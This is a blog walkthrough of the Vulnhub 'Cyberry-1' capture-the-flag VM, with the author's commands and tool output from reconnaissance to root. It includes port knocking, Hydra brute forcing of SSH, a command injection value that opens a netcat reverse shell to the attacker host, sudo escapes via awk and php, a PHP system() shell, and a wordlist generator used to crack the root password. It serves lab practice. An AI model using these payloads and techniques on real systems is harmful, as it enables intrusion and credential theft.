Vulnhub Cyberry – 1 Writeup

This is a walkthrough of Vulnhub machine ‘Cyberry-1 released on Dec 9th, 2017. Credits to Cyberry for releasing this challenging and nightmare VM. I imported the virtual machine in VMware Player in Bridged mode itself. It is Boot2Root Machine, wherein the attacker is challenged to gain root access.

Server IP: 192.168.1.104
Attacker IP: 192.168.1.101
Note: Edit hosts file to add “192.168.1.104 cyberry” (Not Mandatory)

Using Nmap, enumerating for open ports and their respective services

root@kali:~# nmap -sV 192.168.1.104
Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-18 05:53 IST
Nmap scan report for 192.168.1.104
Host is up (0.00012s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     ProFTPD 1.3.5b
22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.25 ((Debian))
666/tcp open  doom?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.60%I=7%D=1/18%Time=5A5FE913%P=x86_64-pc-linux-gnu%r(NUL
SF:L,BD,"Interesting\x20fact:\nThe\x20tiny\x20hairs\x20on\x20raspberries\x
SF:20and\x20blackberries\x20are\x20called\n\"styles\"\x20and\x20are\x20lef
SF:tover\x20from\x20the\x20berry\x20blossom\x20and\x20serve\nto\x20protect
SF:\x20the\x20berry\x20from\x20damage\.\nHave\x20a\x20a\x20great\x20day!\n
SF:")%r(RPCCheck,BD,"Interesting\x20fact:\nThe\x20tiny\x20hairs\x20on\x20r
SF:aspberries\x20and\x20blackberries\x20are\x20called\n\"styles\"\x20and\x
SF:20are\x20leftover\x20from\x20the\x20berry\x20blossom\x20and\x20serve\nt
SF:o\x20protect\x20the\x20berry\x20from\x20damage\.\nHave\x20a\x20a\x20gre
SF:at\x20day!\n");
MAC Address: 00:0C:29:5B:05:B8 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.15 seconds

Next step involved full port scan, checking FTP Anonymous login, trying for weak passwords in FTP and SSH services. All went in vain.
Enumerating port 666 with Netcat

root@kali:~# nc 192.168.1.104 666
Interesting fact:
The tiny hairs on raspberries and blackberries are called
"styles" and are leftover from the berry blossom and serve
to protect the berry from damage.
Have a a great day!

I really did not understand what it meant.

Moving on to port 80.
Browsing http://192.168.1.104

Enumerating using Nikto

root@kali:~# nikto -h http://192.168.1.104
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.104
+ Target Hostname:    192.168.1.104
+ Target Port:        80
+ Start Time:         2018-01-18 06:05:49 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0xa35 0x55eaceb7495d4 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST 
+ /config.php: PHP Config file may contain database IDs and passwords.
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ Uncommon header 'x-robots-tag' found, with contents: noindex, nofollow
+ Uncommon header 'x-permitted-cross-domain-policies' found, with contents: none
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7535 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2018-01-18 06:06:00 (GMT5.5) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Browsing http://192.168.1.104/login.php

Using “Sign up now” option which leads http://192.168.1.104/register.php, I registered with username “test” and password “test1234”. Log in with the same credentials to get access to a panel as shown below

I didn’t find much to do over here!!

From http://192.168.1.104/login.php, I saw a link to main site http://192.168.1.104/berrypedia.html

Note: Refer Appendix 1 at last to get access to this page in another method.

While browsing links and checking the source, I found placeho1der.jpg

Browsing http://192.168.1.104/placeho1der.jpg

Using Online Photo Editor I rotated twice to right and flipped horizontally using options under Basic menu, to get

The picture says “Port of Tacoma”. On further research, I got to know that four persons are singers who sang the same song ‘I hear you knocking’ in different years.
From top left, clockwise, name and release year of the song; Smiley Lewis – 1955, Dave Edmunds – 1970, Fats Domino – 1961, Gale Storm – 1955. Based on the port and song name, I concluded that this is a clue related to port knocking.

After a lot of strenuous efforts and trial and error, I pinged the creators of VM @cyberrsec for a hint. Based on the hint and further enumeration I got the sequence as anti-clockwise based on the ‘main’ placeho1der.jpg starting from Dave Edmunds. The sequence of ports for port knocking is 1970 1955 1955 1961.

Port knocking using Nmap

for port in 1970 1955 1955 1961; do nmap -p $port 192.168.1.104 --host-timeout 201 --max-retries 0; done

After executing the above command line shell script in a terminal, I initiated full port scan using Nmap

root@kali:~# nmap -p- -sV 192.168.1.104
Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-18 07:02 IST
Nmap scan report for 192.168.1.104
Host is up (0.000099s latency).
Not shown: 65530 filtered ports
PORT      STATE  SERVICE VERSION
21/tcp    open   ftp     ProFTPD 1.3.5b
22/tcp    open   ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
80/tcp    open   http    Apache httpd 2.4.25 ((Debian))
666/tcp   closed doom
61955/tcp open   http    Apache httpd 2.4.25 ((Debian))
MAC Address: 00:0C:29:5B:05:B8 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.53 seconds

A new port 61955 was found hosting a web service.

Browsing http://192.168.1.104:61955

While enumerating this website, similar to the one hosted on port 80, I found a link http://192.168.1.104:61955/H

Browsing http://192.168.1.104:61955/H

The page shows Brainf**k code. I used Execute BrainF**k and executed line by line and stored in a file ‘brainy.txt’ to get the following results.

root@kali:~# cat brainy.txt 
Hello World!
team members
chuck
halle
nick
terry
mary
kerry
pw:bakeoff

Seems like a password and username list. Creating a username list ‘user.lst’ based on the brainy.txt.

root@kali:~# cat user.lst 
chuck
halle
nick
terry
mary
kerry

Using Hydra to find the right combination of the credentials.

root@kali:~# hydra -L user.lst -p bakeoff ssh://192.168.1.104
......
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:6/p:1), ~1 try per task
[DATA] attacking ssh://192.168.1.104:22/
[22][ssh] host: 192.168.1.104   login: mary   password: bakeoff
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-18 07:24:07

Trying username ‘mary’ and password ‘bakeoff’ for SSH access

root@kali:~# ssh mary@192.168.1.104
mary@192.168.1.104's password: bakeoff

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jan 18 01:57:39 2018 from 192.168.1.101
Connection to 192.168.1.104 closed.

The connection is lost immediately, I tried appending commands to the SSH access eg: “ssh mary@192.168.1.104 id” didn’t work. So, I concluded that there is no shell defined for the user “mary”. Trying the same credentials in FTP service gave access.

root@kali:~# ftp 192.168.1.104
Connected to 192.168.1.104.
220 ProFTPD 1.3.5b Server (Debian) [192.168.1.104]
Name (192.168.1.104:root): mary
331 Password required for mary
Password:bakeoff
230 User mary logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwt   3 mary     mary         4096 Jan 18 02:01 .
drwxrwxrwt   3 mary     mary         4096 Jan 18 02:01 ..
drwxr-xr-x   2 mary     mary         4096 Nov 29 22:39 .bash_history
-rwxrwxrwt   1 mary     mary          220 Nov 20 00:34 .bash_logout
-rwxrwxrwt   1 mary     mary         3515 Nov 20 00:34 .bashrc
-rwxrwxrwt   1 mary     mary          675 Nov 20 00:34 .profile
226 Transfer complete

.bash_history being a directory seemed suspicious. Browsing to  .bash_history directory

ftp> cd .bash_history
250 CWD command successful
ftp> ls -al
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 mary     mary         4096 Nov 29 22:39 .
drwxrwxrwt   3 mary     mary         4096 Jan 18 02:01 ..
-rw-r--r--   1 mary     mary           64 Nov 29 22:35 .reminder.enc
-rw-r--r--   1 mary     mary          122 Nov 29 22:39 .trash
226 Transfer complete
ftp> get .reminder.enc
local: .reminder.enc remote: .reminder.enc
200 PORT command successful
150 Opening BINARY mode data connection for .reminder.enc (64 bytes)
226 Transfer complete
64 bytes received in 0.00 secs (240.3846 kB/s)
ftp> get .trash
local: .trash remote: .trash
200 PORT command successful
150 Opening BINARY mode data connection for .trash (122 bytes)
226 Transfer complete
122 bytes received in 0.00 secs (191.2370 kB/s)

Downloaded two files .reminder.enc and .trash from .bash_history to attacker system. Investigating the files

root@kali:~# file .reminder.enc 
.reminder.enc: openssl enc'd data with salted password
root@kali:~# cat .trash 
Most common passwords 2017 (Top 10)

123456
123456789
qwerty
12345678
111111
1234567890
1234567
password
123123
987654321

Seems, like .reminder.enc is encrypted file using OpenSSL and .trash contains a list of passwords. Need to decrypt the file. For easy access, .reminder.enc is renamed to reminder.enc and a password.lst is created using  .trash.

root@kali:~# mkdir openssl_decrypt
root@kali:~# cp .reminder.enc openssl_decrypt/reminder.enc
root@kali:~# tail -n +3 .trash > openssl_decrypt/password.lst
root@kali:~# cd openssl_decrypt/
root@kali:~/openssl_decrypt# cat password.lst 
123456
123456789
qwerty
12345678
111111
1234567890
1234567
password
123123
987654321

To decrypt the file I had to iterate through all the possible ciphers that OpenSSL support and also iterate to try each password from ‘password.lst’. I have used following command line bash script to try the same.

for i in `openssl enc -ciphers | tail -n +2`;do for j in `cat password.lst`; do openssl ${i:1} -d -salt -md md5 -in reminder.enc -out "decrypted$i$j" -k $j;done;done 2>/dev/null

openssl enc -ciphers gives the list of the ciphers that OpenSSL support.

It creates a big list of files in the folder openssl_decrypt after you execute that command line bash script in a terminal as shown below

Now, checking for ASCII files

root@kali:~/openssl_decrypt# file * | grep ASCII
decrypted-aes256987654321:                    Non-ISO extended-ASCII text, with no line terminators
decrypted-aes-256-cbc987654321:               Non-ISO extended-ASCII text, with no line terminators
decrypted-camellia128111111:                  Non-ISO extended-ASCII text, with CR line terminators, with escape sequences
decrypted-camellia-128-cbc111111:             Non-ISO extended-ASCII text, with CR line terminators, with escape sequences
decrypted-camellia-128-ctrpassword:           Non-ISO extended-ASCII text, with NEL line terminators, with overstriking
decrypted-camellia-192-ecb987654321:          ASCII text
decrypted-camellia-256-ecb987654321:          Non-ISO extended-ASCII text
decrypted-des-cfb1234567890:                  Non-ISO extended-ASCII text, with NEL line terminators, with overstriking
decrypted-des-cfb1qwerty:                     Non-ISO extended-ASCII text, with CR, LF line terminators, with escape sequences, with overstriking
decrypted-des-ecb1234567890:                  Non-ISO extended-ASCII text, with no line terminators, with escape sequences
decrypted-desx12345678:                       Non-ISO extended-ASCII text, with NEL line terminators
decrypted-desx-cbc12345678:                   Non-ISO extended-ASCII text, with NEL line terminators
decrypted-rc2-64-cbcpassword:                 Non-ISO extended-ASCII text, with NEL line terminators
decrypted-rc2-64password:                     Non-ISO extended-ASCII text, with NEL line terminators
password.lst:                                 ASCII text

Reading the decrypted file,

root@kali:~/openssl_decrypt# cat decrypted-camellia-192-ecb987654321 
In case I forget, my login is dangleberry69

A new password  ‘dangleberry69’ is found.

While enumerating, http://192.168.1.104:61955, I found another login page similar to the one hosted at port 80.  But this login page didnt allow any registrations. Also, a wrong username is reported while testing the login.

Testing username ‘mary’ and password ‘bakeoff’ shows

In this case, the password was wrong and since no error reported for the user, ‘mary’ is a registered user. Trying username ‘mary’ and password ‘dangleberry69’ retrieved from the decrypted file, we gain access.

Visiting sectionub3r-s3cur3 at http://192.168.1.104:61955/ub3r-s3cur3/index.php, I see the output of command nslookup based on the query.

It presented a classic scenario of command injection vulnerability which can be exploited in this case to gain a low privileged shell.

Setup a Netcat listener on the attacker system at port 443

root@kali:~# nc -nlvp 443
listening on [any] 443 ...

Using “Inspect Element”, edit the options in drop down box as follows to append a command to call a reverse shell to the attacker system. Editing the option value as

google.com; nc 192.168.1.101 443 -e /bin/bash

 

Submitting the query, to gain the reverse shell with user ‘www-data’ privileges.

 

root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.104] 38607
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@cyberry:/var/www/html-secure/ub3r-s3cur3$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Further enumeration revealed another password list

www-data@cyberry:/var/www/html-secure/ub3r-s3cur3$ ls -al     
ls -al
total 20
drwxr-xr-x 3 www-data www-data 4096 Nov 30 01:37 .
drwxr-xr-x 9 www-data www-data 4096 Dec  8 22:49 ..
-rw-r--r-- 1 www-data www-data  312 Nov 29 23:30 index.php
-rw-r--r-- 1 www-data www-data  644 Nov 25 11:45 nb-latin
drwxrwxrwx 2 www-data www-data 4096 Dec  8 14:57 teamdocs
www-data@cyberry:/var/www/html-secure/ub3r-s3cur3$ head -n 10 nb-latin
head -n 10 nb-latin
porto
portavi
amo
amavi
paro
paravi
video
vidi
mitto
misi
www-data@cyberry:/var/www/html-secure/ub3r-s3cur3$

copying the nb-latin to use as password.lst and already created user.lst , new set of credentials are found using Hydra

root@kali:~# hydra -L user.lst -P password.lst ssh://192.168.1.104
.....
[DATA] attacking ssh://192.168.1.104:22/
[22][ssh] host: 192.168.1.104   login: nick   password: custodio
[STATUS] 371.00 tries/min, 371 tries in 00:01h, 233 to do in 00:01h, 16 active

Gaining SSH access as  user nick with password custodio

root@kali:~# ssh nick@192.168.1.104
nick@192.168.1.104's password:custodio 
Last login: Wed Jan 17 21:39:14 2018 from 192.168.1.106
nick@cyberry:~$ id
uid=1003(nick) gid=1004(nick) groups=1004(nick)

Now enumerating for commands under sudo   shows

nick@cyberry:~$ sudo -l
Matching Defaults entries for nick on cyberry:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User nick may run the following commands on cyberry:
    (terry) SETENV: NOPASSWD: /home/nick/makeberry
    (terry) SETENV: NOPASSWD: /home/nick/invoke.sh

Checking invoke.sh as user terry

nick@cyberry:~$ sudo -u terry /home/nick/invoke.sh
readlink: missing operand
Try 'readlink --help' for more information.
/home/nick/invoke.sh: 24: shift: can't shift that many
nick@cyberry:~$ sudo -u terry /home/nick/invoke.sh -h
usage: invoke.sh -e KEY=VALUE prog [args...]
nick@cyberry:~$ sudo -u terry /home/nick/invoke.sh /usr/bin/id
uid=1004(terry) gid=1005(terry) groups=1005(terry)

Shifting from user nick to user terry


nick@cyberry:~$ sudo -u terry /home/nick/invoke.sh /bin/bash -i
terry@cyberry:/home/nick$ id
uid=1004(terry) gid=1005(terry) groups=1005(terry)

Note: Refer Appendix 2 for another possibility

Checking again sudo permitted commands for user terry

terry@cyberry:/home/nick$ sudo -l
Matching Defaults entries for terry on cyberry:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User terry may run the following commands on cyberry:
    (halle) SETENV: NOPASSWD: /usr/bin/awk

Shifting from user terry to user halle

terry@cyberry:/home/nick$ sudo -u halle awk 'BEGIN {system("/bin/sh")}'
$ id
uid=1001(halle) gid=1001(halle) groups=1001(halle)

Checking again sudo permitted commands for user halle:

$ sudo -l
Matching Defaults entries for halle on cyberry:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User halle may run the following commands on cyberry:
    (chuck) SETENV: NOPASSWD: /usr/bin/php

Shifting from user halle to user chuck

$ sudo -u chuck php -r 'system("/bin/bash -i");'
chuck@cyberry:/home/nick$ 

But when I issue any command, in the new shell, an “Intrusion Detection System” turns on

chuck@cyberry:/home/nick$ id
Cyberry Intrusion Detection activated
System Failsafe Mode :SFM: will begin in:

So coming back to halle shell, I create another input based PHP shell so that I can enumerate the system as chuck user

chuck@cyberry:/home/nick$ exit
$ echo \<\?php system\(\$argv\[1\]\)\; \?\> > /tmp/shell.php    
$ php /tmp/shell.php id
uid=1001(halle) gid=1001(halle) groups=1001(halle)
$ sudo -u chuck php /tmp/shell.php id
uid=1000(chuck) gid=1000(chuck) groups=1000(chuck),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

Now while browsing the home directory, I came across

$ sudo -u chuck php /tmp/shell.php "ls -al /home/chuck"
total 40
drwxr-xr-x 3 chuck chuck 4096 Nov 30 23:21 .
drwxr-xr-x 9 root  root  4096 Nov 29 23:58 ..
-rw------- 1 chuck chuck 6175 Jan 18 03:56 .bash_history
-rw-r--r-- 1 chuck chuck  220 Nov 19 13:18 .bash_logout
-rw-r--r-- 1 root  root  9182 Nov 30 22:14 .bashrc
drwx------ 3 chuck chuck 4096 Nov 30 23:26 .deleted
-rw-r--r-- 1 chuck chuck  675 Nov 19 13:18 .profile
$ sudo -u chuck php /tmp/shell.php "ls -al /home/chuck/.deleted/"
total 16
drwx------ 3 chuck chuck 4096 Nov 30 23:26 .
drwxr-xr-x 3 chuck chuck 4096 Nov 30 23:21 ..
-rw------- 1 chuck chuck 1965 Dec  7 16:47 deleted
drwx------ 2 chuck chuck 4096 Nov 30 23:27 ssh_stuff

Reading the contents of deleted file under .deleted directory

$ sudo -u chuck php /tmp/shell.php "head -n 40 /home/chuck/.deleted/deleted"
From:		Berry, Chuck (chuckberry@cyberry)
Sent: 		Wednesday, November 22, 2017 2:52pm
To:		Nick, Chuck (nickberry@cyberry)
Subject:	Re: Christmas Meal
Thanks Nick, that might just help me out!
He did give me a few minor clues...
The password starts with "che" and ends with "rry"
letter e is used three times
letter c is used twice
letter r is used twice
letter b is used twice
letter a is used twice
The only other letters in the password were h,w,m & y
I think I'll probably have to write a little script to bruteforce SSH
with what I already know. If I get it done before close of business 
I'll get onto sorting out the Christmas meal. Promise!
Thanks again
-------------------------------------------------------------------
Ah ok buddy. I don't know if it helps you in any way
but I saw the password jotted down on a post-it note in his office
the other day! I can't recall it exactly but I do remember it being
a concatenated 4-word password....You know like "eatberriesandsmile"
It wasn't that, but it was something like that.... in fact I'm pretty
sure one of those four words was actually latin... Now that I'm thinking
about it I'm pretty sure it was "baca".... well 99% sure. 
I've been studying latin for a few months now, so it kinda 
stuck in the memory
Please don't tell anyone I told you this b.t.w! :-)

The mail talks about password security of root password. Based on the rules, I have followed this methodology to create a wordlist.
1)Since, the rules talks about 4 concatenated words, I have chosen words from American English wordlist present at /usr/share/dict/american-english.
2)The first word starts with ‘che’ , the end word or 4th word ends with ‘rry’ , 2nd or 3rd word can be ‘baca’ and finally 2nd or 3rd word can be an english word.
3)Based on the defined occurences, we can eliminate letter ‘a’ , as it already appears twice in ‘baca’.

First I extract words from American English Wordlist starting with che and store it in a file che.txt.
Now iterate the che.txt to remove words containing letters that are not defined in rules. Here, I also eliminated ‘r’ as it appears twice in ‘rry’.

root@kali:~# mkdir pass
root@kali:~# cd pass
root@kali:~/pass# grep ^che /usr/share/dict/american-english > che.txt
root@kali:~/pass# for char in  a d f g i j k l n o p q r s t u v x z; do grep -v $char che.txt > temp.txt; mv temp.txt che.txt;done

Next, I extract words from American English Wordlist that end with rry and store it in a file rry.txt. Now iterate the rry.txt to remove words containing letters that are not defined in rules

root@kali:~/pass# grep rry$ /usr/share/dict/american-english > rry.txt
root@kali:~/pass# for char in  a d f g i j k l n o p q s t u v x z; do grep -v $char rry.txt > temp.txt; mv temp.txt rry.txt;done

At last, generate another set of wordlist as dict.txt to gather words that contain only letters defined in ruleset.

root@kali:~/pass# cp /usr/share/dict/american-english dict.txt
root@kali:~/pass# for char in  a d f g i j k l n o p q s t u v x z; do grep -v $char dict.txt > temp.txt; mv temp.txt dict.txt;done

Finally, I create a python script that iterates through three files and add ‘baca’ as 2nd or 3rd word to 4-word concatenated which is, in turn, checked for defined occurrences of letters. If true, that particular word is written to a file to generate a rule-based wordlist. To be noted, that some of the Uppercase words that aren’t based on ruleset are added in the wordlist. This script was done vaguely and one is always to welcome to do a better version of the script.

def check_occurence(word):
    e_count = word.count('e')
    c_count = word.count('c')
    r_count = word.count('r')
    b_count = word.count('b')
    a_count = word.count('a')
    
    if e_count==3 and c_count==2 and r_count==2 and b_count==2 and a_count==2:
        return True
    else:
        return False
        
        
first_words = open('che.txt','r').readlines()

end_words = open('rry.txt','r').readlines()

flag='baca'

mid_words = open('dict.txt','r').readlines()

for first_word in first_words:
    for mid_word in mid_words:
        for end_word in end_words:
            test_word1 = first_word[:-1]+flag+mid_word[:-1]+end_word[:-1]
            test_word2 = first_word[:-1]+mid_word[:-1]+flag+end_word[:-1]
            if check_occurence(test_word1)==True:
                final_list = open('final_list', 'a')
                final_list.write(test_word1+"\n")
                final_list.write(test_word2+"\n")
                final_list.close()

Executing it, a wordlist is created as final_list

root@kali:~/pass# python wordlist_gen.py 
root@kali:~/pass# ls
che.txt  dict.txt  final_list  rry.txt  wordlist_gen.py

Finding the correct credentials with Hydra to gain root access

root@kali:~/pass# hydra -l root -P final_list ssh://192.168.1.104
[22][ssh] host: 192.168.1.104   login: root   password: chewbacabemerry
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-18 10:31:08

Finally, gaining SSH access as root user with password chewbacabemerry

Appendix 1

Finding http://192.168.1.104/berrypedia.html in a long method;

Checking the source of http://192.168.1.104 gives base64 encoded strings. Decoding them hints towards a work-in-progress.png, which infact contains ASCII Text edocrq. Browsing http://192.168.1.104/edocrq provides a QR Code. Decoded QR code shows clue about berrypedia.html

Appendix 2

After gaining access as the user nick with SSH,  enumerating the home folder showed a program  makeberry The program was also hinted by the emails present in the same home directory. makeberry seemed to be vulnerable to Buffer Overflow Exploitation. I am not good at that Buffer Overflow exploitation. If you try to exploit it, please guide me how you did it in the comment section.

8 thoughts on “Vulnhub Cyberry – 1 Writeup

  1. Thoroughly enjoyed reading your write-up Prasanna.

    I see you also successfully bypassed any need to explore the buffer overflow on “makeberry” in Nicks home folder by using: sudo -u terry /home/nick/invoke.sh /bin/bash -i
    🙂

    It’s also always interesting to see the different process and methodology people use to get the final root password based on the clues given.

    Excellent work 🙂

    Cyberry

    1. Thank you!! 🙂
      I saw that program and I am not good at buffer overflow exploitations. I will try that method too, once I learn the required things.

Leave a Reply

Your email address will not be published. Required fields are marked *